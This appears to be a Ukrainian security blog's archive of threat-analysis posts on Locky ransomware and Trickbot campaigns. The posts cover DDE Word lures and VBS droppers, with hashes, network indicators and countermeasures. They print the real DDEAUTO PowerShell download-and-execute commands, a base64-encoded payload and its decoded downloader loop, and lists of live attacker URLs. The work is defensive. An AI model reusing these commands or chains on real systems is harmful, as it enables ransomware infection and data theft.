Tag Archive | locky

DDE_Locky_311017

Доброго дня, панове.

Вчора вночі була зафіксована чергова спроба доставки Locky Ransomware через документи з DDE.

Схему активації я вже розбирав детально тому зосередимося на маркерах та контрзаходах.

Рівень загрози – усе ще високий, але не через складність атаки, а через те, що ще не всі організації вжили заходів щодо блокування DDE.

Для організацій, що прислухалися до моїх попередніх рекомендацій , рівень загрози – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що обидва payload вже детектуєються по GTI.

Нагадую, що механізм DDE може бути використаний для запуску команд не лише в Word та Excel а й у Outlook.

Користувачам McAfee VSE/ENS раджу ще раз ознайомитися із простими правилами по блокуванню DDE.

Схема атаки:

email > .doc (DDE) > запитання1? > запитання2? > CMD > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

Маркери IOC:

Обидва файли що були передані на аналіз відносяться до однієї кампанії, посилання з обох ведуть на один і той самий список URL для завантаження payload1

Документ#1

File name Invoice 081839882 10.31.2017
File size 16.74 KB
SHA-256 7a81c498fa2c4bead2792bfa636d2c32f9f630b92c0aa1cceacfb5403aeb0909

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\localesynavesalquiler[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

Документ#2

File name Invoice 091312820 10.31.2017
File size 16.73 KB
SHA-256 66c1be89ca96319d92600aefeecade28ecf312682d94846032ad8fa3635a1575

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\lopezfranco[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

JAB1AHIAbABzACAAPQAgACIAaAB0AHQAcAA6AC8ALwByAG8AcwBpAGEAdQB0AG8AcwB1AGwAaQAuAGgAdQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGMAcQBhAHEAdQBhAGwAaQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGQAaQBlAHQAZQByAGQAdQByAHMAdABpAGcALgBkAGUALwBIAFUAZwBmAHIAcwBlADcAIgAsACIAaAB0AHQAcAA6AC8ALwBlAGQAaQBmAGkAYwBpAG8AZQB4AHAAbwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AZgBpAHIAcwB0AC0AcABhAHIAaQBzAC0AcAByAG8AcABlAHIAdABpAGUAcwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AaABvAHQAZQBsAHgAYQBnAHUAYQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQAcgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdABpADQALgBlAHgAZQAiAAkADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACQAZgBwAA0ACgAJACQAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQADQAKAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAZgBwACkADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZgBwAA0ACgAJAGIAcgBlAGEAawANAAoAfQANAAoAQwBhAHQAYwBoAA0ACgB7AA0ACgAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlAA0ACgB9AA0ACgANAAoACQANAAoAfQA=

Якщо декодувати отримаємо:

$urls = "h11p:\rosiautosuli.hu/HUgfrse7","h11p:\cqaqualite[.]com/HUgfrse7","h11p:\dieterdurstig.de/HUgfrse7",
"h11p:\edificioexpo[.]com/HUgfrse7","h11p:\first-paris-properties[.]com/HUgfrse7","h11p:\hotelxaguate[.]com/HUgfrse7" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\hti4.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Цього разу, на відміну від попередніх скрипт містить цілих 6 посилань на проміжний payload.

Для нас, з точки зору захисту систем, важливе те, що запуск цієї команди призводить до завантаження основного тіла з одної із шести переданих адрес та запис тіла у каталог %temp%

Filename      HUgfrse7      >> tmp\hti4.exe
Size            263KiB (268992 bytes)
SHA256      42c403e7c6e811938b843c9ec915b1190ab7095b1451416ba5e65ff530d6d787

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

hti4.exe > h11p://spooner-motorsport[.]com/UIeu6fgue63

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename        23lfo837.exe
Size               597KiB (610816 bytes)
SHA256          ad0a072948cd6dfa2bd7aa79931b0522084ad8d2b9b4e119b4b9c6ef4a1ae89c

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Детект по GTI

Робота правила Access Protection

Додаткові (вбудовані) правила Acces Protection які могли би зупинити інфікування

(перед запуском DDE навмисне були переведені в режим LogOnly)

Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\OFFICE15\WINWORD.EXE C:\WINDOWS\SYSWOW64\CMD.EXE User-defined Rules:_DDE_BLK_1(cmd) Action blocked : Read
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 91.142.213.150:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\support C:\USERS\OPERATOR\DESKTOP\P2.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси (політики Access Protection)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

91.142.213.150:80 HTTP 139 localesynavesalquiler[.]com GET /kdjsw23FGS HTTP/1.1
89.140.72.153:80 HTTP 129 lopezfranco[.]com GET /kdjsw23FGS HTTP/1.1

перебір джерел проміжного payload

87.229.45.38:80 HTTP 127 rosiautosuli[.]hu GET /HUgfrse7 HTTP/1.1
216.250.115.36:80 HTTP 126 cqaqualite[.]com GET /HUgfrse7 HTTP/1.1 
88.80.210.150:80 HTTP 128 dieterdurstig[.]de GET /HUgfrse7 HTTP/1.1
94.23.221.122:80 HTTP 128 edificioexpo[.]com GET /HUgfrse7 HTTP/1.1
151.80.157.121:80 HTTP 138 first-paris-properties[.]com GET /HUgfrse7 HTTP/1.1

завантаження кодованого тіла Locky

77.72.150.42:80   HTTP 147 spooner-motorsport[.]com GET /UIeu6fgue63 HTTP/1.1

Контрзаходи:

  • Заборона створення дочірніх процесів для додатків MS Office
  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

DDE_Locky

Чув дзвін та не знаю де він…
Зразок Locky який доставляли сьогодні через механізм DDE не був націлений на українські системи.
Принаймні завантажувати основну шифруючу частину для мене він відмовився – це все відлуння західних кампаній
Люди, котрі дослухалися до моїх рекомендацій можуть спати спокійно.
Люди у яких GTI працює – теж, бо payload детектиться по GTI
Нагадую що Locky дає ось таку картинку:
А сьогоднішню (ой вже вчорашню паніку викликала кампанія #BadRabbit – fake flash update) – про неї буде наступний допис
А це в свою чергу означає що зразки документів із DDE не мають відношення до вчорашнього інциденту.
DDE окремо, а BadRabbit – окремо.
Але про всяк випадок дам вам деталі по всім DDE документам-приманкам які мені надсилали, коротко
Invoice_file_63539
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr
75.98.175.70 80 HTTP 129 transmercasa[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1
зразок описаний в повідомленні CERT_UA
Invoice_file_06565.doc
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr

87.106.69.81 80 HTTP 122 urcho[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1

зразки з минулого тижня - блокуйте DDE бо посилань згенерують тисячі тисяч
I_213380.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e "  

I_303643.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_489192.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_535073.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

DC0003342.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://pragmaticinquiry.org/hjergf76');powershell -e $e "  

20170927_954285.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://sene-gal.de/cijweh78fDFA');powershell -e $e "  

- крайні два це вже не Locky а Hacintor але різниці особливої немає
Блокуйте DDE і створення екзешників в %temp%

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

 

MS Office DDE як елемент доставки ШПЗ

IOC_Locky(DDE)_191017

Вчора на аналіз мені передали перший зразок документу-приманки, який використовує DDE для запуску процесу доставки Locky Ransomware.

Механізм Dynamic Data Exchange (DDE) є протоколом який дозволяє передачу даними між додатками. Він може бути застосований для створення документу Word чи Excel, при відкритті якого буде виконуватися довільний код. Вперше про практичне використання DDE було опубліковано ще 9/10/17. Це схоже на спосіб із OLE з яким ми уже мали справу (див JAR_OLE та JS_OLE), але замість вбудованого об’єкту при використанні DDE в документ “зашивається” команда на виконання тої чи іншої дії. Чому це становить небезпеку? В даному випадку в документі немає макросу, отже він має високі шанси пройти механізми фільтрації.

Рівень загрози – високий. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload вже детектуєтся по GTI.

Трохи аналітики:

В даному випадку зловмисники застосували DDE для обходу фільтрів пошти.

Для обходу блокування систем, що розповсюджують був введений проміжний список (перша команда powershell).

Для ускладнення виявлення кінцевої мети був введений проміжний downloader який оцінює систему і може не продовжити роботу.

(!)Цей зразок Locky має вбудовану можливість розповсюдження по локальній мережі через вразливість SMB (подібно до WannaCry)

Схема атаки:

email > .doc (DDE) > powershell > GET URL list > GET downloader > %temp%\*.exe > GET encoded payload > %temp%\*.exe

Маркери IOC:

File name I_141268.doc
SHA-256 4a7f805f6b8fec64d3cf07c02a1d200c703ce4cc6ddf2dabd56ad9d6c936c603
File size 13.03 KB

При відкритті файлу користувач бачить два повідомлення-попередження про “відновлення зв’язків”:

Якщо увімкнути відображення форм то можна побачити саму команду:

Якщо жертва натискає “Ок” в фоні winword.exe створює дочірній процес cmd та через нього передає команду на powershell:

WINWORD.EXE /n "C:\Users\operator\Desktop\I_213380.doc" /o "u" 

cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -e DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOg...==

Якщо декодувати отримаємо:

$urls = "h11p://shamanic-extracts.biz/eurgf837or","h11p://centralbaptistchurchnj.org/eurgf837or","","h11p://conxibit.com/eurgf837or" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\rekakva32.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Запуск цієї команди призводить до завантаження основного тіла з одної із трьох переданих адрес та запис тіла у каталог %temp%

File name eurgf837or  >>  temp\rekakva32.exe 
SHA-256 d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4
File size 113.75 KB

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

rekakva32.exe > h11p://hair-select.jp/fef44gddd.enc

File name fef44gddd.enc
SHA-256 6686965dc309055937e048e9bd13e3cbb5a97a550e2af7d86914f9241e5b033e
File size 636 KB

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename  5l46zw33.exe
SHA-256 4c054127056fb400acbab7825aa2754942121e6c49b0f82ae20e65422abdee4f
File size 636 KB

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширрення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

66.36.173.246:80    HTTP 135 ryanbaptistchurch.com GET /KJHDhbje71 HTTP/1.1

перебір джерел проміжного payload

176.103.130.130:80 HTTP 135 shamanic-extracts.biz GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 140 centralbaptistchurchnj.org GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 126 conxibit.com GET /eurgf837or HTTP/1.1

завантаження кодованого тіла Locky

180.222.185.74:80   HTTP 157 hair-select.jp GET /fef44gddd.enc HTTP/1.1

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

PS

Додаткові джерела по темі DDE

  1. Microsoft Office Attack Runs Malware Without Needing Macros
  2. Malware delivered via Necurs botnet by DDE feature in Microsoft Word
  3. How to protect yourself from exploits in Office programs
VR

Еволюція скриптів

До того, що скрипти-приманки можуть містити кілька зпасних посилань ми вже звикли.

Також звикли до перевірки Public IP та вибору з двох гілок завантажень.

Сьогодні ботнет Necurs розповсюджував новий варіант VBS скрипта, активація кого призводила до завантаження payload лише за певних умов:

File name: Invoice 89533683 10.18.2017.vbs
SHA-256: f166c84f7b732c380fd4a73540eec12d74290a04155edad7a1f4848811090867
File size 10.37 KB

Скрипт виконує збір параметрів про ОС та надсилає їх через POST запит

"POST", "http://haddownding.net/trtrtr.php",false [163.172.153.154]

В залежності від відповіді на цей запит скрипт або отримує адресу на завантаження payload або ж завершується.

Скрипт який потрапив мені сьогодні до рук буув орієнтований на системи з двох країн

так машини із США отримували
niv785yg _ Locky
Filename niv785yg
Size 623KiB (637952 bytes)
SHA256 64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484
dbatee[.]gr/niv785yg
goliathstoneindustries[.]com/niv785yg
3overpar[.]com/niv785yg
pciholog[.]ru/niv785yg
disfrance[.]net/p66/niv785yg
а системи з Великобританії
iuty56g _ Trickbot
Filename iuty56g.exe
Size 393KiB (401920 bytes)
SHA256 9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b
envi-herzog[.]de/iuty56g
pac-provider[.]com/iuty56g
pesonamas.co[.]id/iuty56g
disfrance[.]net/p66/iuty56g

Природньо що на моїй тестовій системі скрипт завершився одразу.

Дані про джерела були взяті з блогу My Online Security

Варто бути готовим до того, що схожі скрипти перепишуть та переорієнтують на український сектор.

Тому краще заздалегіть вжити відповідних заходів, а саме:

Контрзаходи: (прості але дієві)

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесів WScript.exe, CScript.exe, Powershell.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й) – радикально проте раз і назважди
  • Заборона створення та зчитування/запуску *.JS*, *.VB*, *.WS*, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !

Для оптимального захисту:

  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_vbs_asorti_111017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки Locky Ransomware та Trickbot.

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через необфусковані VBS скрипти у оболонці 7z.

Трохи аналітики:

  • схожа розсилка вже проходила 28 версеня
  • скрипти містять 6 посилань на два різних payload (два Locky та trickbot)
  • адреси на  завантаження payload не обфусковані, проте додана перевірка коду країни
  • в залежності від приналежності public IP використовується одна з двох гілок URL
  • слід остерігатися появи схожих скриптів із обфускацією та завантаженням payload по HTTPS
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що dropper та payload Trickbot детектуються по GTI.

Схема атаки:

email > Attach (7z) > VBS > Country by IP? > choose URL > GET > %temp%\random.exe

Маркери IOC:

File Name F9785396895.vbs
SHA-256 30f064b3c28ba251ab30f77337724a0d449d12943720697bb06ce5999f2b6520

перевірка зовнішньої адреси:

dataUrls = Array(“http://freegeoip.net/json/“,”http://www.geoplugin.net/json.gp“,”https://ipinfo.io/json“)

дві гілки завантажень

ZimZamZum = Array("globoart.es/jhbfvg7?","fetchstats.net/p66/jhbfvg7","teracom.co.id/jhbfvg7?") 
Else
ZimZamZum = Array("missinglynxsystems.com/8y6ghhfg?","fetchstats.net/p66/8y6ghhfg","eurecas.org/8y6ghhfg?")
End If

по типам payload:

jhbfvg7 – trickbot

Filename nrbob.exe

SHA256  5553f1e00e182ca5a4aa58c7f0fecb0b7a81b697f04d8194121e818358cf2196Copy SHA256 to clipboard

8y6ghhfg – Locky

Filename BKAoQKtgfOM.exe

SHA256  c35f705df9e475305c0984b05991d444450809c35dd1d96106bb8e7128b9082fCopy SHA256 to clipboard

По зразкам Locky – поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

По trickbot – після запуску дублює своє тіло у

C:\Users\operator\AppData\Roaming\winapp\random.exe

Закріплюється через задачу системного планувальника

\services update c:\users\operator\appdata\roaming\winapp\random.exe

запускає новий екземпляр svchsot та інжектує себе у нього

C:\Windows\system32\svchost.exe > svchost.exe -k netsvcs

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

перевірка зовнішньої адреси

104.31.11.172 80 HTTP 460 freegeoip.net GET /json/ HTTP/1.1 
178.237.36.10 80 HTTP 466 www.geoplugin.net GET /json.gp HTTP/1.1
172.217.20.174 443 TCP 54 49377 → 443 [ACK] Seq=204 Ack=2837 Win=64240 Len=0 (HTTPS)

завантаження Trickbot

86.109.170.198 80 HTTP 290 globoart.es GET /jhbfvg7? HTTP/1.1 (+) Trickbot
91.225.48.94 80 HTTP 296 fetchstats.net GET /p66/jhbfvg7 HTTP/1.1 (+) Trickbot
202.169.44.149 80 HTTP 292 teracom.co.id GET /jhbfvg7? HTTP/1.1  (-) 404 Not Found

трафік після активації Trickbot

49.51.134.78 80 HTTP 100 unhanorarse.info POST /tr554.php HTTP/1.1  (application/x-www-form-urlencoded)

завантаження Locky

66.36.173.181 80 HTTP 302 missinglynxsystems.com GET /8y6ghhfg? HTTP/1.1 (-) 403 
91.241.236.102 80 HTTP 297 fetchstats.net GET /p66/8y6ghhfg HTTP/1.1 (+) Locky
185.58.7.11 80 HTTP 291 eurecas.org GET /8y6ghhfg? HTTP/1.1 (+) Locky

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_05-061017

Доброго дня, панове.

В черговий раз фіксуємо спроби доставки Locky Ransomware (вже розглядав , та ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через необфусковані VBS скрипти у оболонці 7z.

Подробиці:

На аналіз були надані два зразки скриптів, які відносяться до однієї кампанії.

Їх активація призводить до завантаження одного й того ж зразка.

Скрипти містять по 3 посилання, перевірки коду країни не виявлено.

GET запити не відрізаються. Частина посилань досі активна!

Користувачі захисту McAfee, зверніть увагу на дві речі:

  • payload детектується по GTI
  • репутація посилань низька – блок на MWG, NSP та WebControl

Схема атаки:

email > Attach (7z) > VBS > 3 URL > HTTP GET > %temp%\random.exe

Маркери IOC:

File Name Invoice_INV000267.vbs
SHA-256 Hash Identifier 158851690993F35C542E43FEF8747487AF7DFDC2C7051F98AF8469EE287AC8A0
File Size 11829 bytes
File Type ASCII text

Plyask = Array("bnphealthcare.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","balzantruck.com/9hgfdfyr6?")

 

202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

завантаження >

File Name WwLlYA.exe
SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

другий скрипт

File Name Invoice_INV000104.vbs
SHA-256 Hash Identifier 919260CC38BF4F7B7BA93F716BA1D12DB4CDEF597F0A94C9036B8F8A16D99BCB
File Size 11743 bytes
File Type ASCII text

Plyask = Array("balzantruck.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","georginabringas.com/9hgfdfyr6?")

 

69.156.240.29      balzantruck.com          GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний
178.136.206.128   mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29        georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

завантаження >

File Name iYwHXKr.exe
